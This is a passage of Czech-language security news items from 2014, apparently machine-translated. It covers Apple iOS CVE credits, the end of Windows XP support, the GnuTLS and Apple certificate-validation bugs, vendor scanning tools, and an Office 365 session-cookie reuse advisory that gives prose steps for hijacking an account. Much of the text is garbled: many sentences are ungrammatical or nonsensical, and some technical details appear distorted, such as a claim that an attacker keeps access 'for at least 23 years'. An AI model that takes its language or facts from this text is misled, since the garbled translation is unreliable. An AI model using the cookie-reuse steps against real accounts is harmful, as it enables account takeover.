zpráv USB. Tento problém byl vyřešen prostřednictvím dodatečného ověření
zpráv USB.
CVE-ID
CVE-2014-1287: Andy Davis NCC Group

Video Driver
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
dopadů: Přehrávání upraveného videa by mohlo vést k zařízení
stále nereaguje
Popis: null problém dereference existoval v zacházení s
MPEG- 4. kódované soubory. Tento problém byl vyřešen lepší
správou paměti.
CVE-ID
CVE-2014-1280: rg0rd

WebKit
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Navštívení upravené www stránky může vést k
pádu aplikace nebo spuštění nežádoucího kódu
Popis: Několik problémy s poškozením paměti existovala v WebKit.
Tyto otázky byly řešeny prostřednictvím lepší správou paměti.
CVE-ID
CVE-2013-2909: Atte Kettunen z OUSPG
CVE-2013-2926: cloudfuzzer
CVE-2013-2928: Google Chrome bezpečnostní tým
CVE-2013-5196: Google Chrome bezpečnostní tým
CVE -2013-5197: Google Chrome bezpečnostní tým
CVE-2013-5198: Apple
CVE-2013-5199: Apple
CVE-2013-5225: Google Chrome bezpečnostní tým
CVE-2013-5228: Keen Team (@ K33nTeam) spolupracuje s organizací Zero Day HP
Iniciativa
CVE-2013-6625: cloudfuzzer
CVE-2013-6635: cloudfuzzer
CVE-2014-1269: Apple
CVE-2014-1270: Apple
CVE-2014-1289: Apple
CVE-2014-1290: ant4g0nist (segfault) spolupracuje s HP Zero Day
Initiative, Google Chrome bezpečnostní tým
CVE-2014-1291: Google Chrome bezpečnostní tým
CVE-2014-1292: Google Chrome bezpečnostní tým
CVE-2014-1293: Google Chrome bezpečnostní tým
CVE-2014-1294: Google Chrome bezpečnostní tým

Informace budou také zveřejněny na Apple Security aktualizace
webu:
http://support.apple.com/kb/HT1222


Microsoft snaha, aby uživatelé klesnout Windows XP pokračuje
10.3.2014 Zranitelnosti | Bezpečnost

Jako datum plánovaného odchodu do důchodu z Windows XP - pravděpodobně jeden z nejoblíbenějších produktů Microsoftu někdy - se blíží, společnost pokračuje ve svém pátrání, aby se co nejvíce uživatelů je to možné přejít na novější verzi operačního systému, pokud možno do systému Windows 8.1.

Plán byl byl na několik let, ale většina uživatelů XP se nepodařilo, aby tento krok pro své vlastní důvody, a Microsoft se snaží jumpstart posun v mnoha ohledech. Nedávno se pokusil naverbovat tech-důvtipný uživatelé pomoci jejich méně znalí přátelé a rodina upgrade na novější verzi systému Windows, a pokud nemohou (počítač je příliš starý), koupit si nový počítač a nový OS. Bohužel pro Microsoft, většina uživatelů zažil tuto výzvu jako špatně maskovaný prodejní hřiště, a bránil dělat změny. Skutečnost, že společnost ani poskytnout dobré aktualizační nástroj byl další kámen úrazu. Ten problém byl vyřešen den předtím, než včera, kdy společnost oznámila, že se spojil s Laplink poskytnout uživatelům Windows XP s volnou migraci dat nástroj, který bude kopírovat své soubory a nastavení ze svého Windows XP počítače do nového zařízení se systémem některou z novějších verzích systému Windows. Také dodal, že systém Windows XP Home nebo Professional edition, které nedělají změny budou upozorněni na to jednou měsíc počínaje dnem 08.3.2014 přes pop-up upozornění, že budou nabízet odkaz na společnosti Windows XP Konec webových stránkách podpory:

Ale to není všechno. Pokud budou i nadále používat OS, a také používat Security Essentials - na které, mimochodem, Microsoft bude i nadále dodávat antimalware podpisy až 14 července 2015 - se mohou těšit na bytí "otravovali" prostřednictvím jiného kanálu. Jakmile Security Essentials je aktualizován na nejnovější verzi (4.5), budou uživatelé Windows XP i nadále vidět varování v programu, a to system tray, že jejich počítač je "potenciálně nechráněný." No, existuje ještě další měsíc jít, dokud nezastaví verze obtěžování OS je podporovány, a těším se na setkání, jaké další nápady Microsoft přijde s další.


Hlavní mezery nalezené v řízení vznikajících technologií
10.3.2014 Zranitelnosti

SailPoint zveřejnil infographic, který nastiňuje nejnovější výsledky výzkumu, které ukazují, že zatímco globální podniky vítají - a v některých případech pověřily - využívání cloudu a mobilních technologií, které nemají IT kontroly na místě, aby řádně spravovat. Bez správné preventivní a detektiv řídí, tyto podniky jsou v konečném důsledku uvedení se zvýšené riziko podvodu, krádeže a porušování soukromí. Klikněte na infographic pro kompletní, velké verze:

Nedávná SailPoint je Market Pulse Survey našli komplexní IT prostředí, kde jsou podniky stále dohání k požadované úrovně dohledu a kontroly potřebné ovládat nové technologie jako součást jejich celkové bezpečnosti a řízení rizik programu. Infographic nastiňuje klíčová zjištění z průzkumu, včetně:
63% podniků se vyžaduje rozhodnutí, tvůrci hodnotit cloudové aplikace jako součást každého procesu zadávání veřejných zakázek software. Již 39% mission-critical aplikace jsou v současné době uloženy v oblaku, čímž se zvýší na 59% do roku 2016.
82% respondentů, aby zaměstnanci mohli používat své osobní zařízení pro přístup k firemním datům a aplikace na práci. Nicméně, cloud a bring-vaše-vlastní-zařízení (BYOD) trendy jsou nápadně chybí bezpečnostní programy většiny firem. Ve skutečnosti, tolik jak 41% respondentů přiznala k neschopnosti řídit cloud a BYOD jako součást jejich identity a přístupu strategie řízení.
Prohlubuje problém, méně než polovina respondentů mají postup na místě, aby se automaticky odstranit mission-critical data z mobilních zařízení, zatímco 46% respondentů nejsou ani důvěru ve své schopnosti udělit nebo zrušit přístup zaměstnanců k aplikacím v rámci celého svého IT prostředí .
Vzhledem k nedostatku viditelnosti, 52% respondentů připouští, že zaměstnanci mají číst nebo vidět firemních dokumentů, které by neměly mít přístup k, a 51% věří, že je to "jen otázkou času", než dojde k porušení bezpečnosti.


GnuTLS knihovna chyba otevírá cestu pro MITM útoky
10.3.2014 Zranitelnosti | Počítačový útok

Kritická kryptografický chyba podobná té, nedávno objevené v iOS a OS X byla odhalena existovat v knihovně kódů GnuTLS, široce používán v open source software a linuxových distribucí. "GnuTLS knihovna poskytuje podporu pro kryptografických algoritmů a protokolů jako Transport Layer Security (TLS). Bylo zjištěno, že GnuTLS nebyl správně zpracovat určité chyby, které by mohly nastat během ověření certifikátu X.509, přimět to, aby nesprávně hlásit úspěšné ověření, "bezpečnostní tým Red Hat je vysvětleno v bezpečí poradenství oznámil vydání aktualizace, která řeší problém. "Útočník by tuto chybu vytvořit speciálně vytvořený certifikát, který by mohl být přijat GnuTLS jako platné pro zvolenou útočníkem (CVE-2014-0092) místě." chyba byla objevena Nikos Mavrogiannopoulos z Red Hat Security Technologies Tým, v průběhu auditu GnuTLS pro Red Hat. Další chyba byla nalezena v cestě GnuTLS ovládal verze 1 X.509 certifikáty, které by mohly umožnit útočníkovi podařilo získat takový certifikát od důvěryhodné certifikační autority pro vydávání certifikátů pro jiné weby, které by být přijata GnuTLS jako platné (CVE-2009-5138). mají chyby byly opraveny a uživatelé GnuTLS se doporučuje přejít na aktualizovaných balíčků a restartovat všechny aplikace spojené s knihovnou GnuTLS, aby se změna projeví. Ostatní Projekty se přestěhovali opravit chybu v této knihovně, včetně Debian a Ubuntu , ale stovky dalších aplikací a operačních systémů používají to jsou ještě k tomu. vývojáři GnuTLS také poskytuje novou verzi knihovny, která řeší problém, a jak Alternativou k tomu, náplast, která dočasně zmírňuje ji. chyba je dost vážné, protože to by mohlo umožnit útočníkovi vydávat se za jinou webovou stránku a zachytit a dekódovat všechny šifrované provoz, který jde od koncového uživatele k serveru a zpět. příčinou chyba je, jako ve výše uvedeném případě Apple, zdánlivě jednoduchá a velmi snadno přehlédnout v zběžné kontroly - pár "goto vyčištění" volá na špatném místě, a škoda byla dělána. A zřejmě to bylo děláno lety - v roce 2005, nebo ještě dříve. Toto zjevení a podobnost mezi dvěma crypto nedostatky již způsobit, že některé on-line komentátoři spekulovat, že obě byly vloženy úmyslně zpravodajské komunity USA. To je, samozřejmě, jen teorie. Co je určitě známo, že knihovna GnuTLS je tak široce používané, že to bude trvat nějaký čas pro každý projekt použitím provést nezbytná bezpečnostní opravy.


Špatné zabezpečení dat návyky spotřebitelů, by měla bát zaměstnavatele
6.3.2014 Zranitelnosti
Spotřebitelé nejsou získávání údajů o jejich osobní notebooky nebo stolní počítače správně, pokud vůbec, podle výsledků průzkumu Harris Poll zadala WinMagic. a pouhých 14 procent z těch, kteří vlastní notebook nebo stolní počítač šifrování svých osobních počítačích, a více než čtyři z deseti (44 procent), nejsou vyzváni při spouštění svého počítače zadat heslo.

Většina z těch, kteří vlastní notebook, stolní počítač nebo mobilní zařízení, tvrdí, že jejich osobní e-maily (62 procent), osobní fotografie a videa (54 procent) by byl ohrožen, pokud jejich osobní notebook, desktop nebo mobilní zařízení, byly ztraceny nebo ukradeny. Téměř čtyři z deseti (38 procent) by ztratil své bankovní údaje. "Jsem-li IT manažer nebo C na úrovni výkonné, musím předpokládat, pracovníky ve své firmě nechápu, jak zabezpečit firemní data, na základě mého čtení výsledků tohoto průzkumu, "řekl Mark Hickman, COO v WinMagic. "Koncepce šifrování-jen failsafe způsob, jak zabezpečit informace v klidu, vše je ale naprosto cizí pro spotřebitele, i když téměř čtyřicet procent z nich, aby data citliví jako bankovnictví informace o svých osobních notebooků či stolních počítačů." Další závěry expertů WinMagic čerpat z výsledků:

Práce produkt v ohrožení: Zaměstnavatelé by si měli uvědomit, že podle průzkumu, 15 procent z těch, kteří vlastní notebook, stolní počítač nebo mobilní zařízení, říkají obsah související s prací by byl ohrožen, pokud jejich notebook, stolní počítač nebo mobilní zařízení byly ukradeny nebo ztraceny , a pouze 14 procent z těch, kteří vlastní notebook nebo stolní počítač šifrování svých strojů. Pracovní ztrátě dat na jakémkoliv počítači, ať už společnost vlastněná nebo ne-klade společnost na riziko porušování shody, potřeby pro zveřejnění narušení bezpečnosti, a dalších zákonem stanovených činností, jako jsou drahé pokuty.
A / V znamená-OK mnohé: 71 procent z těch, kteří vlastní notebook nebo stolní počítač, aby firewall a / nebo anti-virus software aktuální informace o svých strojích. Tato ochrana představuje naprosté minimum, a výsledek šetření by mohlo naznačovat, rozšířený omyl, že anti-virus software je dostatečně zabezpečit stroje.
Dobře inzerované heslo osvědčených postupů nenásleduje: Pod třetina (31 procent) z těch, kteří vlastní notebook nebo stolní počítač říká, že "pravidelně měnit" svá hesla na jejich osobní notebooku nebo stolním počítači. Vzhledem k tomu, kolikrát jsou spotřebitelé připomněl změnit svá hesla, jako je nízké procento je alarmující.
Průzkum byl proveden on-line v USA, u 2047 dospělých ve věku 18 a starší, z nichž 2009 vlastnit notebook / stolní počítač. WinMagic nabízí eBook IT dotčeným o spotřebitelských zlozvyků odhalil výsledků průzkumu manažerů. EBook obsahuje doporučené postupy pro zabezpečení podnikových dat a školit pracovníky, a můžete si je stáhnout zde (nutná registrace).


95 % bankomatů má Windows XP. Jsou naše peníze v ohrožení?
6.5.2014 Zranitelnosti

Většina peněžních automatů se spoléhá na operační systém, který brzy půjde do důchodu.

O tom, že podpora jednoho z nejoblíbenějších operačních systémů všech dob Windows XP skončí 8. dubna, jste pravděpodobně slyšeli již mnohokrát. Stejně tak vám asi netřeba připomínat, že přechod na novější verzi je dobrý nápad nejen z bezpečnostních důvodů.

Mnoho lidí přesto Windows XP stále používá. Mezi tyto nenapravitelné uživatele přitom patří i bankovní ústavy, které zastaralou platformu používají pro své bankomaty. Jakmile skončí podpora, hrozí tedy, že se těmto strojů připojeným k internetu dostane zvýšeného zájmu ze strany kyberzločinců.

Převést všechny peněžní automaty na novější verzi Windows by však rozhodně nebylo levné ani jednoduché. Jen v USA existuje asi 200 tisíc bankomatů běžících na Windows XP a jak ve své zprávě nedávno napsala CNN, změna operačního systému v jednom bankomatu by stála 1 až 3,5 tisíce dolarů. Není divu, že banky se do upgradu zrovna nehrnou.

Co to však znamená pro nás? Pokud bude většina bankomatů zranitelná vůči útokům, skutečně v sobě najdeme tu odvahu bankomaty i nadále používat? A jak vůbec poznáme, jestli vybraný bankomat používá podporovaný operační systém?

Podle CNN je tu naštěstí jedno řešení. Velké banky prý s Microsoftem jednají o možnosti prodloužené podpory pro své systémy v bankomatech. Banky tak získají více času na upgrade, kterému se stejně v budoucnu nevyhnou. Například společnost JPMorgan již údajně získala speciální prodlouženou podporu na dobu jednoho roku a v červenci hodlá spustit hromadný přechod na Windows 7. Naplánovanou aktualizaci potvrdily i další bankovní domy.

O své peníze se tedy pravděpodobně bát nemusíte. A pokud i přesto bankomatům nevěříte, stále je tu stará dobrá bankovní přepážka.


GnuTLS Ověření certifikátu Chyba odhaluje linuxových distribucích, Apps Attack
5.3.2014 Zranitelnosti

GnuTLS, open source SSL a implementace TLS používá ve stovkách softwarových balíků, včetně Red Hat ploše a serverových produktů a všech distribucích Debian a Ubuntu Linux je nejnovější šifrovací balíček nesprávně ověřit digitální certifikáty jako autentické. Zranitelnost, objevil a včera inženýry na Red Hat, klade jakékoliv stránky či aplikace v závislosti na GnuTLS na riziko zneužití.

"Bylo zjištěno, že GnuTLS nebyl správně zpracovat určité chyby, které by mohly nastat během ověření certifikátu X.509, přimět to, aby nesprávně hlásit úspěšné ověření," řekl Red Hat v poradenství vydané v pondělí. "Útočník by tuto chybu vytvořit speciálně vytvořený certifikát, který by mohl být přijat GnuTLS jako platné pro zvolenou útočníkem místě."

Zranitelnost je děsivé podobnosti a chyby hlášené Apple ve svém mobilním operačním systémem iOS a OS X pro počítače Mac. Nyní známý jako goto selhání chyba, oddělené skvrny byly vydány na zranitelnost, která odstranila kontroly SSL certifikát z příslušných operačních systémů.

"To je opravdu tak zlé, jak to jen jde," řekl Kenneth White, bezpečnostní expert a hlavní vědecký pracovník sociálních a vědeckých systémů v Severní Karolíně. "Útočník může triviálně navázat libovolnou doménu a aby to vypadalo, autoritativní a důvěryhodný pro žadatele. Tak, a to nejen odposlech citlivých kanálů, ale [také] potenciálně podkopat důvěryhodný balíček proces podepisování stejně. "

Bílá odhaduje, že více než 350 balíčků, které spoléhají na GnuTLS kryptografických knihovnách, kromě populárních linuxových distribucí, hlavní crypto a poštovních knihoven, jako libcrypt a libmailutils a cURL jsou ovlivněny.

"CURL (libcurl3-GnuTLS), dále se používá aktualizací systému balení jak pro OpenPGP (gnupg2 a gnupg-curltransport), stejně jako systém balíček updater sám (apt-transport-https)," řekl White. "Ale co je zvláště obtížné, je pochopení nesčetné následné závislosti, jako je například XML parserů, atd. Obecně platí, Debian a Ubuntu se vyvaroval OpenSSL licenčních důvodů, takže tam skutečně existují Nginx a Apache nainstaluje, že použití GnuTLS stejně."

GnuTLS vydal poradenství , potvrzuje zranitelnost a že byla objevena během auditu GnuTLS pro Red Hat. Vyzývá uživatele, aby upgrade na nejnovější verzi GnuTLS 3.2.12 nebo 3.1.22 nebo aplikovat patch pro GnuTLS 2.12x. Red Hat Enterprise Linux Desktop, HPC Node, Server a Workstation v. 6, stejně jako Red Hat Enterprise Linux Server USA a EUS v 6,5ar ovlivněny, Red Hat uvedl ve svém poradenství.

Nedávná Apple chyba přinesl tento problém do popředí. Apple vydal záplatu na 21.února pro iOS a dny později na OS X. Útočník s mužem ve středním umístění v síti by mohlo představovat neplatný certifikát, který by projít kontroly obvykle navrženy tak, aby odmítnout takovou cert . Útočník by pak mohl sledovat komunikaci a síťový provoz myslel, že je v bezpečí.


Podpora Windows XP v Číně bude také ukončena

5.3.2014 Zranitelnosti
Microsoft uvedl, že nezměnil svou politiku ukončení podpory pro Windows XP ani v Číně a „odstřihne“ uživatele tohoto více než dvanáct let starého operačního systému po 8. dubnu od bezpečnostních aktualizací stejně tak, jako uživatele jinde na světě.

„Ohledně podpory operačního systému Windows XP se vůbec nic nezměnilo,“ uvedla mluvčí Microsoftu v emailu na přímý dotaz, zda Číňané budou mít zvláštní podmínky. Microsoft totiž nedávno uvedl, že spolupracuje s několika čínskými poskytovateli antivirů na zajištění bezpečnostní podpory XP i po 8. dubnu a bude těmto firmám poskytovat informace o nově nalezených zranitelnostech tak, aby tomu mohli přizpůsobit svá řešení. Některá média pak tuto informaci mylně interpretovala tak, že americký gigant plánuje v Číně aktualizovat Windows XP i po 8. dubnu 2014.

„Čínská pobočka Microsoftu úzce spolupracuje s čínskými poskytovateli bezpečnostního softwaru jako Tencent tak, aby byla zaručena bezpečnost čínských uživatelů Windows XP před tím, než přejdou na novější verzi našeho operačního systému,“ uvedl Microsoft na svých webových stránkách.

Dnešní oznámení mluvčí Microsoftu bylo podobné jako to, které Microsoft učinil ve Spojených státech v lednu. Před dvěma měsíci Microsoft přehodnotil svá dřívější rozhodnutí a uvedl, že bude nabízet bezplatný antivirový program Security Essentials pro XP až do 14. července 2015, tedy i více než rok poté, co přestane vydávat opravy pro svůj zastaralý OS. O několik dnů později Microsoft potvrdil, že bude také nadále distribuovat pro uživatele XP do stejného data svůj nástroj s názvem Malicious Software Removal Tool (MSRT).

Německá společnost AV-Test, jež se zabývá pravidelným hodnocením antivirových produktů pro Microsoft, nedávno uvedla, že podle jejích průzkumů většina výrobců antivirů bude pro uživatele Windows XP poskytovat aktualizace databází i poté, co Microsoft ukončí jejich podporu.

Podle nejnovějších statistik analytické společnosti Net Applications byly Windows XP v únoru nainstalovány na 29,5 % všech počítačů na světě. A značné množství uživatelů XP je v Číně. Jak však Microsoft dnes potvrdil, ani Čína nedostane speciální výjimku. „Naše rada uživatelům zůstává pořád stejná – přejděte z Windows XP na moderní operační systém jako Windows 8.1,“ dodala mluvčí.

Microsoft včera mimo jiné vydal nástroj s názvem PCmover Express for Windows XP, který uživatelům usnadní přenos dat, nastavení a profilů z Windows XP na novější verzi jeho OS. Tato aplikace, již vyvinul ve spolupráci se společností Laplink, má být na konci týdne dostupná zcela zdarma na webu windowsxp.com.


Apple konečně záplaty kritické SSL chybu v OS X
4.3.2014 Zranitelnosti
Apple vydal aktualizaci pro OS X, které, mimo jiné, záplaty neslavný "gotofail" chybu , jejíž existence byla veřejně odhalil minulý pátek. chyba byla původně záplatovaný na iOS a Apple TV s aktualizacemi vytlačila téhož dne, ale OS Uživatelé X byly ponechány se ptát, proč oprava nebyla stanovena i pro ně.

Chyba z implementace SSL zranitelné a umožní útočníkovi s výsadní postavení sítě, zachytit a / nebo modifikovat data v relacích chráněných SSL / TLS. Bezpečnostní výzkumníci byli volání pro Apple, aby si pospíšil s oprava, a vytvořili testovací stránky že uživatelé OS X mohl navštívit Safari, zda byly v ohrožení. . Firefox a Chrome použití se doporučuje v mezidobí jako chyba neměla vliv těchto prohlížečů Je zajímavé si uvědomit, že poznámky k verzi pro OS X v10.9.2 Mavericks aktualizace nezmínil chyba je pevná - člověk musel podívat na bezpečnostní stránku Apple pro nová verze, aby zjistil, že to byl (a vidět to, co ostatní věci byly vylepšeny a oprava). Uživatelé jsou vyzýváni, aby aktualizovali své systémy co nejdříve, ale jako Andrew Cunningham uvedeno, přes-400mb aktualizace by mohlo způsobit problémy pro organizace, které mají testovat aktualizace před jeho provedením na svých systémů. "Menší samostatný aktualizaci, která je stanovena pouze goto selhání chyba by být lepší volbou pro podniky," řekl poukázal . Bohužel, v tomto případě musíme brát to, co jsme může dostat, a neočekávám, že Apple komentář nebo vysvětlit, že konkrétní rozhodnutí. Zajímalo by mě, i když, pokud budou nakonec podělit, jak byla chyba objevena, a kým - zejména s ohledem na spekulace .


Identifikovat a opravit chyby zabezpečení vašich SSL certifikátů
3.3.2014 Zranitelnosti
Na tuto měnu oznámil tuto měnu certifikát inspektora , nástroj určený pro rychlé vyhledání problémů v konfiguraci certifikátů a provádění, a poskytuje v reálném čase analýzu celého certifikátu krajiny organizace, včetně ukončení pracovního poměru koncových bodů protokolu SSL.

SSL / TLS certifikáty jsou klíčovým obrana proti nežádoucímu dohledu on-line aktivity uživatelů. Přesto až příliš často správci systému nepodaří správně nakonfigurovat certifikáty, nevědomky odchodu otevřené zranitelnosti. Držet krok s nejnovějšími bezpečnostními osvědčených postupů, jakož i sledování certifikátů je náročný úkol, zejména pro podniky, které spravují tisíce certifikátů. Často, manuální sledování procesů se používají, které zavádějí lidské chyby a způsobit prostoje nebo neznámá slabá místa zabezpečení, jako jsou konfigurace s kódové soupravy odolné vůči zločinu, BEAST, PORUŠENÍ nebo jiné útoky. V ostatních případech, oddělení mimo to by mohlo nasadit své vlastní certifikáty , vytvoření slepé místo pro administrátory. To může také vést k konfiguračních problémů, které downgrade účinnost SSL certifikátů, na kterých organizace spoléhají. Pokud certifikát inspektora, může bezpečnostní profesionálové objevovat zapomenuté, zanedbané nebo chybně nakonfigurován certifikáty, a identifikovat potenciální zranitelná místa, jako jsou slabé klíče, problematické šifer a osvědčení vypršela . Pro každou potenciální hrozby zjištěné, nástroj poskytuje seznam sanacemi. Certifikát inspektor kontroluje síť uživatele odhalovat všechny certifikáty v provozu, kontroluje konfiguraci SSL a provádění, a poté zobrazí výsledky v intuitivním a interaktivním palubní desce. profesionálové zabezpečení může použít nástroj pro:
 

Zjištění jejich bezpečnostní účaří s reálném čase, komplexní přehled o SSL certifikátech a jejich ukončení koncových bodů v celé síti.
Detekce zranitelnosti prostřednictvím skenování pro problematické osvědčení nebo serverových konfigurací a snadno zkontrolovat výsledky pomocí certifikátu inspekční intuitivní dashboard.
Analýza datových bodů bezpečnostních buď kamenivo nebo specifické pro každý certifikát a koncový bod.
Zmírnit zjištěné chyby, jako jsou šelmy, a nedodržování směrnic průmyslu, jako jsou CA / Browser Forum základních požadavků, a to prostřednictvím doporučených kroků.
Obnovit vypršení certifikátů prostřednictvím výslovného dotačního procesu DigiCert je.
Archiv snímků z každé detekční událost dokumentují zlepšení v průběhu času.
Run zprávy z libovolného místa s administrativními kontrolami cloud-based DigiCert je.
Pomocí patentovaného algoritmu, certifikát Inspektor analyzuje SSL certifikáty a zánik koncové body pro mnoho bezpečnostních faktorů, včetně:
Slabé klíče, šifry a hašovací algoritmy
Verze SSL / TLS
Vypršení platnosti certifikátů
TLS opětovné projednání
Perfect Forward Secrecy
Konfigurace náchylnost k trestné činnosti, PORUŠENÍ, BEAST atd.
Jména Neshoda server / certifikát
Chybí AIA je.
Pro každý SSL certifikát a ukončení koncový bod, správci obdrží zprávu o zranitelnosti, odpovídající třídy a rychlý seznam osvědčených postupů ke zmírnění zjištěných nedostatků. "Poskytnutím žalovatelné informace o konfiguraci certifikátů a stavu nasazení, v kombinaci s nápravným nástrojů, DigiCert pomáhá organizacím zavřít Rozdíl mezi zakázek certifikátu a bezpečné nasazení certifikátů, "řekl generální ředitel společnosti DigiCert Nicholas Hales. "Nasazení pevně nakonfigurovaných certifikátů je důležitým linii obrany proti unwelcomed dohledu. Certifikát inspektor pomůže organizacím zářit světlo na oblastech spadajících do jejich sítě, které by mohly představovat číhající hrozby. Věříme, že tento nástroj může stavět na úsilí druhých v bezpečnostní komunity s cílem zlepšit on-line důvěru v nové, hmatatelným způsobem. "


Zdarma řízení zranitelnost služeb pro malé a střední firmy
3.3.2014 Zranitelnosti
Tripwire debutoval Tripwire SecureScan, zdarma, cloud-based služeb pro správu zranitelností pro (IP adresy) až 100 Internet Protokolu o vnitřních sítí. Tento nový nástroj umožňuje správu slabých míst snadno dostupné pro malé a střední podniky, které nemusí mít prostředky pro bezpečnostní technologie podnikové třídy.

Menší podniky obvykle mají méně prostředků na investice do bezpečnosti, což je velmi atraktivní pro cyberattackers a podle společnosti Symantec, kybernetickým útokům na malé a střední podniky se zvýšil o 300 procent v roce 2012. Malé a střední podniky často spoléhají na anti-virus software a firewally, ale tyto bezpečnostní kontroly, zatímco užitečný, nestačí, protože nemají odhalit neopravených systémy, které jsou často cílené u cyberattackers. Tripwire SecureScan je komplexní řešení pro správu zranitelností, které nevyžaduje žádné hardware nebo Software musí být instalován a spravován. Organizace všech velikostí mohou využít službu zjistit podrobné informace o síťových zařízení a najít slabá místa v hardwarových a softwarových aplikací, které jsou používány v kybernetickým útokům. Řešení objeví tyto chyby a pak poskytuje uživatelům priorit, Podrobné informace o tom, jak opravit tyto bezpečnostní slabiny. To používá stejný osvědčené podnikové třídy pro skenování zranitelností platformy za Tripwire v produktech zranitelnosti Tripwire IP360 a Tripwire PureCloud Enterprise. . Tyto produkty chrání mnoho z největších a nejvíce citlivé sítí na světě Klíčové SecureScan funkce patří:
 

Volný vnitřní skenování zranitelnosti až 100 zařízení čtyřikrát měsíčně.
Snadná objev ztracené nebo skryté zařízení, které může vyústit v bezpečnostní slepých míst.
Prioritní zranitelnost bodování, který umožňuje nejprve opravit nejdůležitější bezpečnostní problémy.
"Organizace, které žijí" pod hranicí chudoby zabezpečení "jsou řezání zatáček na bezpečnost po celou dobu," řekla Wendy Nather, ředitel výzkumu, podnikání bezpečnostní praxe na 451 Research. "Oni nemusí mít odborné znalosti naladit a používat open source nástroj, a to buď. S komerční produkt k dispozici na nich zdarma vám může pomoci tyto podniky dostat nohu -. V některých případech poprvé "


Apple opravuje kritickou šifrovací chybu v iOS, OS X fix být propuštěn "brzy"
2.3.2014 Zranitelnosti
V pátek Apple oznámil propuštění aktualizaci softwaru pro svůj mobilní operační systém iOS, který řeší kritické šifrování chybu. Podobný aktualizace také byl propuštěn pro Apple TV.

Zdá se, že tam bylo pár chybějící validace kroků, které z implementace SSL zranitelné a umožní útočníkovi s výsadní postavení sítě, zachytit a / nebo modifikovat data v relacích chráněných SSL / TLS - ve skutečnosti, se připojit man-in- -Middle útok. iPhone a iPad uživatelům se doporučuje provést aktualizaci na verzi 7.0.6 nebo 6.16 z OS co nejdříve, a uživatelé OS X jsou vyzýváni, aby se zabránilo používání veřejné sítě, dokud stejná oprava je propuštěn pro OS. Podle různých zdrojů, prohlížeč Apple Safari a výchozí Mail.app jsou jak zranitelné, ale Firefox a Chrome nejsou ovlivněny, takže uživatelé systému Mac může dočasně přepínat s pomocí těch. Apple slíbil uvolnit OS X opravu "brzy". Vědci, kteří mají Testované starší verze obou iOS a OS X k závěru, že chyba byla přítomna měsíců. bezpečnostní výzkumník Google Adam Langley je vysvětleno , jak se vada funguje a kde chyba se stalo ve zdrojovém kódu. jednoduchosti chyby a skutečnost, že by mohla umožnit někdo - a zejména zpravodajské agentury - to využít pro špehování uživatelů vedla ke spekulaci, že je to existence mohla být úmyslné. Druhou možností je, že Apple má špatnou proces kód recenze na svém místě. Problém také lidé kritizují Apple preference pro proprietární uzavřený zdroj. Tvrdili, že takový do očí bijící chyba by mohla být spatřen před věky, pokud více výzkumníků bezpečnosti měl možnost přezkoumat kód.


Office 365 - Účet únos Cookie Re-Use Chyba, prodlužuje

1.3.2014 Zranitelnosti

Název:
Office 365 - Účet únos Cookie Re-Use Chyba, rozšířené Prodávající: - Microsoft produkty postižené: - Office 365 E3 balení (verze od 22 února 2014) - SharePoint Online Services Abstrakt: Známý účet únos přes cookie re použití vada byla původně hlášena v červenci 2013 prof Sam Bowne a projednán v několika ? stejně jako původní zranitelnost hasn t Beed uzavřeny této zprávy, je tu další vážný dopad na poražení tuto chybu: - Změna hesla uživatele neruší ukradené cookie - Blokování účtu (uživatel uzamčení) nebude fungovat jako dobře . To umožňuje útočníkovi zneužít uživatelský účet po dobu nejméně 23 let, než byl účet zcela vymazán Kroky pro reprodukci: * Předpoklady: - Office 365 účtu (E3 balíček s Sharepoint Services) - Jak škodlivého systém: Windows O / S Client a Interner Explorer 9 až 11 nebo Firefox 25 + (Jiné operační systémy a prohlížeče dosud nebyly testovány), cookies, nesmí být odstraněny při zavření prohlížeče. - pouze ověřování hesla použít (výchozí) * Příprava kroky: 1) Přihlášení uživatele o použití nedůvěryhodné zařízení (např. internetová kavárna) se office365 přes oficiální Microsoft Online portál login.onmicrosoft.com s nastavením?, aby mi byly podepsány dne? 2) uživatel se dostane k jeho povolených webových stránek týmu na SharePoint Services, např.. replacethiswithyourtestsite.onmicrosoft.com 3) uživatel nyní opustí nedůvěryhodný zařízení buď vypnutím počítače, zavřete prohlížeč nebo jen odhlásili pouze z os, s ), není odhlášení z aplikace Microsoft portálu správně b) a není čistil Cookies * Známá První část - Cookie opětovné použití vada: 4) Uživatel se zlými úmysly (předvečer) lze použít (důvěrné) SharePoint url jednoduše znovu pomocí cookie. 5) Z platného Sharepoint Online Services přístup všechny ostatní služby lze být přístupné (OWA, SkyDrive a tak dále), zatímco osvěžující své pověření cookies, * rozšíření chyba - může t blokování útočník:? 6) Je-li uživatel by mohl být vědomi své poruchy, nebo je detekován zneužití, uživatel se může pokusit změnit své heslo nebo nechat správce resetovat heslo uživatele nebo . 7) Správce může rozhodnout o zablokování účtu od připojení pomocí oac 8) V obou směrech, ukradený cookie bude stále možné přijímat (viz kroky 4 a 5.) Prodávající odezvy: - problém byl ohlášen společnosti Microsoft v několika způsoby: - Ticket 1235308167 (podpora Microsoft USA) - Ticket 201402160322129434 (Microsoft Partner Support Německo) - Ticket 114021011169872 (Microsoft Office Online Uživatelská podpora Německo) - Žádné řešení nabídl tak daleko, ale problém byl uznán by Microsoft Partner německou podporu řešení: -. Z forenzních důvodů by mohlo být to nedoporučuje, ale v té době jsem don t vidět nějaké jiné řešení, jediný způsob, jak je úplně odstranit napadl účtu - Tento způsob je shodný s řešení společnosti Microsoft nabízí jako řešení ve svém internetovém fóru.


Bezpečnostní chyby nalezené v 80% nejprodávanější SOHO bezdrátových směrovačů
28.2.2014 Zranitelnosti
Tripwire analyzoval bezpečnost poskytované z nejoblíbenějších bezdrátových směrovačů používány v mnoha malých a domácích kanceláří a zjistil, že 80 procent z top 25 nejprodávanějších SOHO bezdrátových modelů routerů Amazon se chyby zabezpečení.

